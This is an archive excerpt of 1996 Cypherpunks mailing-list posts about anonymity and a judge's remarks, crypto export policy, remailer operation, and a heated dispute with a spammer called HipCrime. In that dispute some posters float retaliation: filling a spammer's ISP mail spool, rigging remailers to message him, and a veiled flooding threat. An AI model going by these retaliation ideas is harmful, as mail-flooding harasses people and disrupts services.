To: Greg Broiles <cypherpunks@toad.com
Subject: Re: Fed appellate judge remarks re anonymity, free speech on the  net
Message-ID: <199609130236.TAA22049@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:40 PM 9/12/96 -0700, Greg Broiles wrote:
>
>The Daily Journal, a LA/SF legal newspaper had an article today (9/12) about
>a lunchtime address given by Ninth Circuit Judge Alex Kozinski last Monday
>at an Internet Law Symposium in Seattle.
>
>The article quotes Kozinski as saying "I have a severe problem with
>anonymous E-mailers . . . You don't have a right to walk up to somebody's
>door and knock with a bag over your head." The article says Kozinski likened
>anonymous E-mail to menacing someone.

I wish somebody would go up to these guys and point out that since the 
Internet is, more or less, a huge, worldwide, VOLUNTARY association of 
people, _we_ don't think these judges have any sort of "right" to regulate 
its content.  Furthermore, it isn't clear that the proper regulators of the 
Internet shouldn't be an entirely different set of people selected by 
Internet users, RATHER than the same old government system that's managed to 
screw up the rest of the world so far.

And if you're looking for "menacing," I'd say that describes the 
government's behavior towards the Internet over the last year or two.


>Kozinski also suggested that computer-generated or morphed images of
>children involved in sexual acts may not be protected under the Constitution
>because of ongoing trauma to the child,

Which child?  Does he understand what "computer-generated" means?

>while computer-generated or morphed images of adults would be protected. 

What about the "ongoing trauma" to the adults?  I smell hypocrisy.

>The article says that Kozinski was skeptical that he or other federal judges
>necessarily agreed with the 3rd Circuit's ruling in _ACLU v. Reno_ (finding
>the CDA unconstitutional). 
>
>Kozinski is considered relatively conservative and relatively libertarian,
>as 9th Circuit judges go. 

Which means that he'll last just a little longer "when the cyber-revolution 
comes."


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Fri, 13 Sep 1996 13:19:38 +0800
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: Sen. Burns' statement on postponement of Crypto vote today.
In-Reply-To: <v0300781eae5e1ea8378a@[206.119.69.46]>
Message-ID: <199609122356.TAA01893@nrk.com>
MIME-Version: 1.0
Content-Type: text


Robert Hettinga sez:
> From: somebody
> Administration in next two
> weeks will unveil its "new and improved" encryption policy, which will likely
> offer a shift in licensing to Commerce Dept., and gradual easing of
> exportable strength, in exchange for industry-funded key escrow management
> demo projects.

I hear that the Feebs and DOJ are upset that they do not have enough
pull in NSA/Commerce decisions; and wants to get in the middle of
process. Industry is screaming over that.

Of course, Feebs et.al have not legal standing in ITAR decisons, but
that's not stopped 'em before....



-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Fri, 13 Sep 1996 11:35:52 +0800
To: Ross Wright <rwright@adnetsol.com>
Subject: Re: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]
In-Reply-To: <199609122357.QAA24466@adnetsol.adnetsol.com>
Message-ID: <Pine.BSF.3.91.960912185335.4035G-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



> >
> > However, since others may think like you, I guess I'll have to add a line
> > above my link stating that email not related to the purpose of my site
> > will be happily proof-read at the rate of $200 per hour,
> 
> Just great.  That sure takes away any anonymity you had about being 
> "on the cutting edge" of the information age.  That 1952 "proof-read" 
> crap went out in the 70's.  How can you hope to enforce it?  It's a 
> joke, right? :)  Maybe not, since it's on your sig-line.
> 

It was sarcasm. I don't hope to enforce it. And I don't 
have a sig-line.

> 
> Sorry, Wombat.  As much as I hate to agree with this multi level 
> long distance phone company spammer.  He is right.  A website is an 
> open invitation to comment and e-mail.  Better password your site if 
> you want to solve this problem.  Then no-one can visit it, and no-one 
> can send out a spider to get your e-mail address.  That's what I do, 
> send out a robot to bring back e-mail addresses.  Of course I only 
> send to makers of software, and my product applys to their world.
> 

Comment is one thing. Mass junk mail is another. I'd view "comment" as 
expressing an opinion. If I put an "email to:" tag on a web site, I'm 
inviting "comment" on the information I've placed in public view - 
there's reasonable expectation that the "comment" will be pertinent, even 
if it is only "Your automated gif sucks." This isn't quite the same as 
inviting completely irrelevent junk mail, and I still fail to see how 
you make this leap of logic.

You are on a public mailing list, aren't you? You have some degree of 
expectation as to the pertinence of topics discussed on said list, don't 
you? Even if it is c'punks? The same holds true for newsgroups. The vast 
majority of 'net users dislike off-topic discussion; they subscribe to 
mailing lists and newsgroups to discuss topics of relevence and mutual 
interest. It is highly self-centered of you to assume the "right" to 
waste their time with unwanted and completely off-topic communication. 


> If you don't want spam in your mail box:
> 
> 1. Don't have a website or don't put your e-mail address on your 
>     website

1a. Set up a robots.txt file. See http://www.info.webcrawler.com. Polite 
robots will comply, though I doubt spammers building mailing lists will be 
polite.

> 2. Don't post to newsgroups

2a. Actively exercise YOUR freedom of speech to disuade spammers. Contact 
their ISP. Forward a complete copy of the spam; this lets the ISP see 
what's being sent where, and fills up their mail spool too. Most ISPs 
will decide that the spammer can take his/her business elsewhere.

> 3. Don't post to mailing lists
> 4. If you post do so anonymously

Oh, so now I MUST remain anonymous, or I invite any and all 
correspondence regardless of relevence. Seems like your exercising of 
your rights is compromising mine.

Laws restrict freedom. They determine what we cannot do without fear of 
penalty. Some individuals exercise their "right" to freedom of action to 
the extent that they harm others. This causes those "others" to 
willingly/grudgingly give up some of their own freedom of action in 
exchange for protection.

When you exercise your "right" to free speech to the extent that you piss 
off a large segment of society, society will react by reducing its 
measure of freedom of speech. You have a right to speak your message, but 
you do not have the right to spray-paint it on the wall of my house. You 
may broadcast your message on the airwaves, but are subject to some 
restrictions. You once enjoyed the "right" to fax anything you wanted to 
send to my fax machine. Enough junk mail was sent to enough fax machines, 
and now many jurisdictions have another LAW restricting this behavior. I 
don't want to see legislation come to the 'net, but it will, and your 
attitude hastens it.

The long-term result of your abuse of your "right" to free speech is the 
invitation of government meddling into my right to free speech.

- r.w.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gcooke@Rt66.com (Gregg Cooke)
Date: Fri, 13 Sep 1996 12:46:35 +0800
To: Hallam-Baker <hallam@ai.mit.edu>
Subject: Re: What is best policy paper on crypto?
Message-ID: <v01540b00ae5e20229de0@[198.59.162.186]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:07 PM 9/12/96, Hallam-Baker wrote:
>Adam Shostack wrote:
>>
>> Declan McCullagh wrote:
>> | I happen to know that an influential Congresspern will be meeting with
>> | some Cato folks tomorrow morning, so I'm assuming this isn't an idle
>> | request.
[ . . . ]
>
>>         The NAS report, despite a few silly points, does push for
>> liberalization of the export regime, standardization, a switch to
[ . . . ]
>
>I agree that the NAS report is the one to use. Its from an authoratative
>source and the conclusions are pretty reasonable. Its perhaps not as far
[ . . . ]

        I'm gonna stick my neck out here and ask a naive question: where
        can I find "the NAS report" mentioned in this thread?  Note that
        I'm new to this list (2 days) so please be kind if this paper is
        extremely well known (it's not known to me but it sounds like
        something I need to read).

                        -Gregg






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 13 Sep 1996 11:11:28 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: Sen. Burns' statement on postponement of Crypto vote today.
In-Reply-To: <v0300781eae5e1ea8378a@[206.119.69.46]>
Message-ID: <Pine.SUN.3.94.960912201919.18367A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Sep 1996, Robert Hettinga wrote:

> --- begin forwarded text
> 
> 
> From: somebody
> Date: Thu, 12 Sep 1996 15:03:21 -0400
> To: rah@shipwright.com
> Subject: Re: Sen. Burns' statement on postponement of Crypto vote today.
> 
> Robert--
> My sources indicate that no markup will be
> held on the Burns bill before Congress adjourns for year.

Concur.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Fri, 13 Sep 1996 12:20:40 +0800
To: cypherpunks@toad.com
Subject: Fed appellate judge remarks re anonymity, free speech on the (fwd)
Message-ID: <199609130147.UAA01876@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 12 Sep 1996 17:40:19 -0700
> From: Greg Broiles <gbroiles@netbox.com>
> Subject: Fed appellate judge remarks re anonymity, free speech on the
>   net
> 
> The article quotes Kozinski as saying "I have a severe problem with
> anonymous E-mailers . . . You don't have a right to walk up to somebody's
> door and knock with a bag over your head." The article says Kozinski likened
> anonymous E-mail to menacing someone.

I guess the esteemed judge doesn't believe in Halloween....

Does this also mean that he supports the complete elimination of junk mail
that has no return address on it?

> Kozinski is considered relatively conservative and relatively libertarian,
> as 9th Circuit judges go. 

Conservative AND Libertarian? Talk about a non-sequitar.


                                                       Jim Choate
                                                       ravage@ssz.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Fri, 13 Sep 1996 11:32:09 +0800
To: cypherpunks@toad.com
Subject: Re: SPL -- Suspicious Persons List
In-Reply-To: <512ja2$oko@life.ai.mit.edu>
Message-ID: <3238B073.2847@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> Digitaltronics Corporation V.P of Human Relations: "Joe, thanks for coming
> in this morning. I'm sure you're busy, so I'll make this as short as
> possible. OK with you?"
> 
> Joseph Shlubsky, Programmer: "Uh, sure." <nervously>

Yeah, thats why we Europeans have labour laws that prevent
Digitaltronics
from doing any such thing without getting sued from here to eternity.

Pity you guys missed out on the idea of trades unions and think that
employment is some kind of serfdom in which you loose all your rights
the 
day you sign up. If you hadn't sold your government to the cooprorations
a while back you might have got out of the middle ages.

I suspect that even under the weak as dishwater employment laws that
you have in the US would provide ample opportunity to file a
countersuit.

When that type of thing happens, they don't give the reason, they do
it behind closed doors. How do you fight that?


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 13 Sep 1996 12:05:07 +0800
To: Hallam-Baker <hallam@ai.mit.edu>
Subject: Re: SPL -- Suspicious Persons List
In-Reply-To: <3238B073.2847@ai.mit.edu>
Message-ID: <199609130114.VAA08507@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Hallam-Baker writes:
> Pity you guys missed out on the idea of trades unions and think that
> employment is some kind of serfdom in which you loose all your
> rights the day you sign up. If you hadn't sold your government to
> the cooprorations a while back you might have got out of the middle
> ages.

Yes, we could be a workers paradise like one of those lovely European
countries with double digit unemployment and all. Too bad we didn't go
in for democratic socialism while we could have, eh?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Fri, 13 Sep 1996 15:24:49 +0800
To: Greg Broiles <gbroiles@netbox.com>
Subject: Re: Fed appellate judge remarks re anonymity, free speech on the net
In-Reply-To: <2.2.32.19960913004019.006df548@pop.ricochet.net>
Message-ID: <Pine.3.89.9609122104.A23562-0100000@netcom12>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Sep 1996, Greg Broiles wrote:

> 
> (Also in today's news, the 9th Circuit upheld a CA statute forbidding sales
> of material considered "harmful to minors" from vending machines.)
> 

Oh, well, that just narrows it down really well.  Might as well just take 
out all of the machines now, because you could make a case that just 
about ANYTHING out of a vending machine is "harmful to minors".  Soda 
machines? Caffeine and sugar.  Snack machines?  Sugar again.  Those 
machines in supermarkets that give little toys?  A child *could* swallow 
one and choke.  And on and on and on.  

Even if this statute is meant only to apply to cigarette machines, which 
would seem to be the case given all of the anti-cig stuff going on now,
what good will it do?  I have never (in 20 years living in CA) seen a 
cigarette machine out where a child could get something from it, only 
inside a pool hall or another adult-only establishment.  Another one of 
those bills to "selectively enforce" things, perhaps?  Sheesh.



---

Zach Babayco

zachb@netcom.com  <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Fri, 13 Sep 1996 14:55:28 +0800
To: HipCrime <robert@precipice.v-site.net>
Subject: Re: who can count?
In-Reply-To: <3238B18E.7211@precipice.v-site.net>
Message-ID: <Pine.3.89.9609122103.A23562-0100000@netcom12>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Sep 1996, HipCrime wrote:

> > No, this b.s. is more like having someone put a dead skunk in my 
> > mailbox, with no return address, trying to prevent me from sending 
> > them 100 dead skunks as a return favor. And about as welcome.
> 
> 100 dead skunks in exchange for ONE is exactly what this discussion
> is all about.  You CypherWIMPS just love over-kill.  EmailRobot sent
> ONE message to EACH address.  Are you guys so unskilled in arithmetic
> to understand the difference between 1 and 100?
> 

It doesn't matter if you get one or one hundred messages - both are still 
annoying as hell.  If I wanted whatever you're advertising or selling, 
I'd come look for it.  I'd prefer that you not mail me.


---

Zach Babayco

zachb@netcom.com  <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Fri, 13 Sep 1996 14:03:49 +0800
To: cypherpunks@toad.com
Subject: Re: Bubba Bottoming out on Cocaine Paranoia?
Message-ID: <199609130148.VAA15888@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


No comments about Bubba, Joe Sixpack, the NWO, Greys, Reds, Greens, 
those on the dole or those high on Dole....

Just notice the strange contradiction below:

=WIRED WORLD WILL "DIMINISH NATIONAL SOVEREIGNTY"
[..]
=when the whole world is "wired" and e-cash is the norm.  The result
=will be less powerful governments in relation to criminal
=organizations such as the Mafia and international drug cartels, says
=Michael Nelson, who adds that organized crime members are already
=some of the most sophisticated users of computer systems and strong
=encryption technology. ...

Ok, the "bad guys" will use sophisticated security devices...  but below,
apparently the "good guys" don't use the same sophisticated tech, and 
therefore are at an even greater risk from another set of "bad 
guys"...

=                                   ... In addition, computer crackers will pose a
=more significant threat.  In response, Nelson advocates resolving the
=issue of whether unauthorized access of a computer is an "act of
=trespass" or an "act of war," and prosecuting the intrusions
=accordingly. (BNA Daily Report for Executives 6 Sep 96 A14)
= (Courtesy of Edupage)
 
---
No-frills sig. Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Fri, 13 Sep 1996 15:08:25 +0800
To: HipCrime <wombat@mcfeely.bsfs.org>
Subject: "Unwanted Mail"
Message-ID: <199609130451.VAA01566@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On Or About: 12 Sep 96 at 22:49, Rabid Wombat wrote:

> 
> The same useless and boring message posted by rote to a huge collection of
> addresses is spam, unless participation is voluntary and consensual, in
> which case it is a mailing list. :)
>

Spam, like the definition of useless and boring, is very subjective.  
So, I feel that waht I am doing is useful and interesting.  I am sure 
that HipCrime feels the same.  Just keep on bitching to the list and 
don't call your congressman about a few unwanted e-mails.
 
Tim May writes:

>But to attempt to define "SPAM" (unless you're Armour) is dangerous.
>This whole notion of "unwanted mail" is ill-defined and not something
>"the law" should get involved in, in my view. (And CP technologies
>certainly are consistent with this, e.g., placing the role of
>screening on those who set up gates, not on tracking down True Names
>for prosecution.)
>In the case of actual USPS mailboxes, there are laws which prevent
>others from using them (e.g., no UPS or FedEx deliveries). For sure,
>dead skunks can be placed in mailboxes, or under porches, or whatever.
>The law can't fix everything.

Thanks, Tim.  My point exactly! 

Ross

===========
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joey Grasty" <jgrasty@gate.net>
Date: Fri, 13 Sep 1996 14:23:24 +0800
To: remailer-operators@c2.org
Subject: WinSock Remailer Accepting Only PGP Messages Starting September
Message-ID: <199609130213.WAA113878@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


Y'all:

Due to the large number of inconsiderate users and spammers,
the vast majority of whom do not use PGP, we are changing the
operation of the WinSock Remailer at winsock@c2.org to accept
only incoming messages that are encrypted with PGP.  This 
change will become effective September 16, 1996 at 9:00 PM EDT.

On a brighter note, a new release of the WinSock Remailer will
be available on September 17.  In addition to bug fixes, a 
number of new features have been added including:

- support for shared or exclusive POP account (the operator
  will be able to operate the remailer from his personal 
  account; messages without proper remail headers will be
  left in the mail spool for retrieval with any other POP
  mail client).

- support for changing the outgoing message pool size on the
  Outgoing Mail dialog box.

- remailer now accepts "help" in addition to "remailer-help"
  to retrieve the help file for the remailer.  A large 
  number of help requests were piling up in the reject
  directory, so this should cure that problem.

And yes, the bug that prevented the remailer from operating
in PGP Only mode, has been fixed.  :-)

Regards,

Joey Grasty (jgrasty@gate.net)
Jim Ray (liberty@gate.net)
WinSock Remailer Operators




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 13 Sep 1996 15:57:43 +0800
To: cypherpunks@toad.com
Subject: "Remailers can't afford to be choosy"
Message-ID: <ae5e35f8070210041ef6@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



I've picked the provocative title "Remailers can't afford to be choosy" so
as to make an important point about remailers. First, a few responses to
Rabid Wombat:

At 3:26 AM 9/13/96, Rabid Wombat wrote:

>Hormel, isn't it? Anyway, my point is that the law should not be involved
>in it, but that it is going to be sucked in whether we like it or not if
>social pressure is ineffective. What is, and is not "spam" has been

Social pressure rarely works, of course. Canker and Sleazewell used the
negative publicity about their spamming to sell more books. And the law
rarely works, either.

What _does_ work, throughout history, is technology. Locks on doors work
where all the social pressure and all the legal measures fail.

The SPAM situation has various parallels (and differences, of course). The
point being argued in this latest thread, that "inappropriate" responses to
a "mail me" button on a Web page have these parallels:

* a contest operator announces a drawing based on forms filled out and
deposited in a box, but neglects to check against multiple entries. One
person "games against" the rules and submits 25,000 entries. The contest
operator claims that this is fraud, or "contest SPAM," to coin a phrase. He
splutters, "It's not fair! I assumed only one entry per person, even though
I took no steps to ensure this. I want a law!"

(Astute readers will recognize this situation from an early Heinlein novel.)

* a radio station invites listeners to call in, then complains that one
person is "calling too much."

(A common situation with talk radio, and one best handled by screening
callers. Even so, some of the same callers get through by using various
disguised voices, etc. As with the contest situation, a problem best solved
by the party involved, not the legal system.)

* in general, any of several "over use of free or public resources." The
bum who sits in a park, the kid who hangs out at the mall for several hours
a day, the family who park themselves on the best fishing spot every
weekend, etc.

Again, these are not situations where I think either "social pressure" or
"the law" works very well. Better solutions are to find ways to meter
scarce resources.

...
>We're therefore stuck - as a community, we cannot stop what many people
>consider to be undesirable, as we cannot even define it, and the unwashed
>masses will set governance upon us for our "own good."

No, it is not hopeless. "Congestion pricing" is the operative phrase. Web
sites that are too crowded can add capacity and increase advertising rates,
or can charge admission, or the like. Remailers can (and will, sooner
rather than later) charge "digital postage" for the service they are
performing. (If nobody will pay, and the remailer network fizzles out, then
clearly there was not an overall market, was there? I doubt that this is
so, though at this early stage there is a lot of experimentation,
subsidized sites, etc. Not an argument for laws, though.)

>The ability to be anonymous on the 'net is generally a good
>thing. It has allowed people access to information that might have
>otherwise been denied them. It is an important freedom, and one that is
>already in danger of being taken away through legislation (Georgia on my
>mind ...). Abuse of this freedom by someone for purely commercial
>purposes is certainly not going to help matters.

_Lots_ of uses of remailers are "not going to help matters." So? Use of
remailers to post the Homulka-Teale stuff was not well-received, use of
remailers to post child porn is not well-received, use of remailers to
bypass national security laws is not well-received. So?

Remailer operators really, really, really have to get out of the business
of looking at "what customers are using the remailers for" and then
deciding to block senders, recipients, etc. based on what they see.

I don't mean to minimize their concerns about illegal material being sent,
about spamming, about insults and libelous stuff, etc., but it's important
for all remailers to carefully think back to Chaumian mixes and what they
mean. For one thing, there is no screening, no approval of content, etc.
There might be digital postage, of course. And chaining, preferably. And
encryption all the way through. Reread Chaum's original 1981 paper, the
inspiration for our earliest thoughts about remailers.

"Remailers can't afford to be choosy"

>Note the earlier comment about someone being unhappy about their
>"remailer-baby" being used for such a purpose - someone running a
>remailer is generally doing so as a service, and is generally not
>compensated for the equipment, time, energy, and aggravation. A lot of
>remailers have shut down recently. Is this helping the cause of privacy
>and free speech?

Yes, actually. The shut-down of nonanonymous remailers is a good thing,
ultimately. And the lessons of what happens when remailers become too well
known (and hence nice fat targets for spammers, denial of service
attackers, Churches, etc.) is also clear.

By the way, today's remailers appear to be primarily _experiments_ or
_casual services_, not altruistic services for some nebulous idea of "free
speech." (Besides, if it's illegal for "spammers" to use remailers, so much
for "free speech.")

Digital postage is the ideal way to reduce the amount of "spam" flowing
through a remailer site. The issue of "unwanted mail" is a more complicated
issue, given our current "free to deliver" set up, and not one which
directly involves the issue of remailers (except insofar as making it
harder to track spammers down, but this is just the standard case with all
crimes/etc. committed with remailers, and is a separable issue).

>providor of web content as a courtesy to their readers. Why does it fall
>to them to provide a completely off-topic forum for someone else's views?
>How are they any different from members of a public mailing list? Must
>the members of c'punks and toad.com accept all unpaid advertising in the
>name of free speech?

Absent rules or arrangements by the owners of the toad.com site, there is
no legal recourse. And given the international nature of lists on the
Internet, exactly which country's laws would be the operative ones? Would
Poland request the extradition of a Brazilian who "spammed" via the
Cypherpunks list, currently operating out of California? The mind boggles.

Look to technoological/economic solutions as a first resort, not a last resort.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 14 Sep 1996 03:01:11 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: TWA 800 - Serious thread.
In-Reply-To: <Pine.BSF.3.91.960911171725.17601K-100000@mercury.thepoint.net>
Message-ID: <3238F0F0.274B@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Brian Davis wrote:
> On Wed, 11 Sep 1996, jonathon wrote:
> On Wed, 11 Sep 1996, Gary Howland wrote:
> But the public *is* asked to assent to those methods - your chance to 
> vote on them is known colloquially as "jury duty".

> But judges have said that Jury Nullification is not acceptable
> legal practice.

> And other judges have said the opposite.
> EBD

This seems similar to the Declaration-of-Independence argument about the 
"right of the people to overthrow the govt.", etc.

You can't expect the Constitution (a doctrine of law) to provide details 
on extra-legal activities such as violent overthrow of the govt., nor 
can you expect judges to explain in court how to ignore the Law.

And if all else fails, you can try picketing...

A well-written company charter (as an example) would contain provisions 
for exceptions to the charter, not to abrogate or undermine the charter, 
but just as a kind of escape valve. One would note the exception(s) for 
historical purposes, and for purposes of future litigation, and so on.
I can't help but wonder if the U.S. Constitution would have been better 
for something similar to this, instead of pasting on Amendments for 
every little thing.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 14 Sep 1996 03:03:11 +0800
To: Chip Mefford <cmefford@avwashington.com>
Subject: Re: Child Porn and Thought Crime
In-Reply-To: <v03007800ae5ca499b1f5@[207.79.65.35]>
Message-ID: <3238F248.2C9C@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Chip Mefford wrote:
> If it is a crime to posses photograhic child pornograhy, and this
> crime is tested in court.,
> Then is it a crime for a sightless person to posses  photograhic child
> pornograhy? If so, than this matter needs to be thought out some more. 
> If no (by test of court, paper is more or less
> meaningless) than it is thought crime.

I've speculated for a long time about what Thomas Jefferson might say if 
he were around. Something like: Think liberally, but act conservatively.

--Just a thought.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Fri, 13 Sep 1996 15:36:27 +0800
To: HipCrime <robert@precipice.v-site.net>
Subject: Re: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]
In-Reply-To: <3238BD18.64F8@precipice.v-site.net>
Message-ID: <Pine.BSF.3.91.960912223603.4680B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



OTOH, there's always altavista.

- r.w.


On Thu, 12 Sep 1996, HipCrime wrote:

> > I'd view "comment" as expressing an opinion. If I put an "email to:" 
> > tag on a web site, I'm inviting "comment" on the information I've 
> > placed in public view 
> 
> A message sent to a MAILTO button on a WebPage, which contains the URL 
> of another WebPage is EXACTLY on-topic.  It's my belief that any active 
> "webmistress" would be interested in what other sites have to offer.
> 
> -- HTTP://www.HIPCRIME.com
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Fri, 13 Sep 1996 15:04:29 +0800
To: HipCrime <robert@precipice.v-site.net>
Subject: Re: who can count?
In-Reply-To: <3238B18E.7211@precipice.v-site.net>
Message-ID: <Pine.BSF.3.91.960912223950.4680D-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 12 Sep 1996, HipCrime wrote:

> > No, this b.s. is more like having someone put a dead skunk in my 
> > mailbox, with no return address, trying to prevent me from sending 
> > them 100 dead skunks as a return favor. And about as welcome.
> 
> 100 dead skunks in exchange for ONE is exactly what this discussion
> is all about.  You CypherWIMPS just love over-kill.
                     ^^^^^^^^^^^

I suspect you may soon be hearing from far worse than I ...

Some punks take their colors seriously.

  EmailRobot sent
> ONE message to EACH address.  Are you guys so unskilled in arithmetic
> to understand the difference between 1 and 100?
> > One message is NOT spam, 100 messages to a single box IS spamming. > >
> > -- HTTP://www.HIPCRIME.com
> 

The same useless and boring message posted by rote to a huge collection of
addresses is spam, unless participation is voluntary and consensual, in
which case it is a mailing list. :)

Given that less than 1% of those spammed are likely to reply, and merely 
hit the delete key and curse a bit, you are hereby awarded approximately 
100 dead skunks.

- r.w.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Fri, 13 Sep 1996 16:09:33 +0800
To: "Z.B." <zachb@netcom.com>
Subject: Re: Fed appellate judge remarks re anonymity, free speech on the net
Message-ID: <2.2.32.19960913060631.006bf908@pop.ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:24 PM 9/12/96 -0700, zachb@netcom.com wrote:
>> (Also in today's news, the 9th Circuit upheld a CA statute forbidding sales
>> of material considered "harmful to minors" from vending machines.) 
>
>Even if this statute is meant only to apply to cigarette machines, which 
>would seem to be the case given all of the anti-cig stuff going on now,
>what good will it do?

Whoops. Sorry. Wrong context. What I should have said was "the 9th Circuit
upheld a CA statute forbidding sales of *printed* material considered
'harmful to minors' from unsupervised vending machines". The publication(s)
at issue are those newsprint swingers' magazines (e.g., "me and my friend
want to screw you and your friend. here is a picture of us naked."). 

(doh!)

 
--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HipCrime <robert@precipice.V-site.net>
Date: Fri, 13 Sep 1996 16:46:04 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <3238FD6C.5CB7@precipice.v-site.net>
MIME-Version: 1.0
Content-Type: text/plain


Here's a collection of your various threats:

> I suspect you may soon be hearing from far worse than I ...
> Some punks take their colors seriously.

> Congradulations. I had at first thought you were a simple fool. 
> Now I'm certain you're an idiot.

> Sounds to me like every remailer can legally be altered to send a 
> small message to hipcrime every time it processes any messages.

> if anyone's got a T3 handy, you could always take the direct approach.

In making these threats, you've mistaken me for someone who cares.
Someone who cares what you send to my box.  I'm actually, and in fact,
homeless in real life.  Yes, both an "idiot" and a "simple fool":
your compliments in my book.  My only equipment is access to friends' 
computers, and a free dialup that the big-hearted SysOp at V-Site gives
me.  (By the way, you've been merciless to him).

In view of this fact:  Do you think that even 1,000,000 messages into 
my stupid electronic mailbox would matter?  Some nights my worries are
of a place to sleep, not how many messages will accumulate during my 
slumber.

CypherPunks live so far from real-life, that it's impossible for them
to communicate rationally.  Never having any danger in their lives,
they want to avoid encountering any in "cyberspace".  They are trying 
to craft that new world according to their intellectual guidelines.
Trying to make sure real-world annoyances have been removed. 

This is what HipCrime's real offense was:  providing a piece of 
unexpected (ok,ok "unwanted", if you prefer) stimulus.  Only a single 
one.  A tiny-little URL, but sent without warning, anonymously, and 
pointing to a strange site.

Since I've UNSUBSCRIBED from your CypherWimps mailing list, and still
receive your messages (two copies, the one you send me, and the one
you send the list), my only conclusion is that Email is your only
social discourse.  Take notice that after this, all future messages
from y'all will feel the power of the DELETE button (unread and barely
noticed).  

Think of how easy it is to move around in "cyberspace".  Do this math:  
	1,000,000 messages = 1 new domain + 1 new mailbox.

In this argument you win, junk Email is SPAM ... but junk SnailMail is

		THIN SLICES CUT FROM OUR PRECIOUS FORESTS.


-- HTTP://www.HIPCRIME.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Fri, 13 Sep 1996 16:57:50 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "Unwanted Mail"
In-Reply-To: <ae5e0391020210044711@[207.167.93.63]>
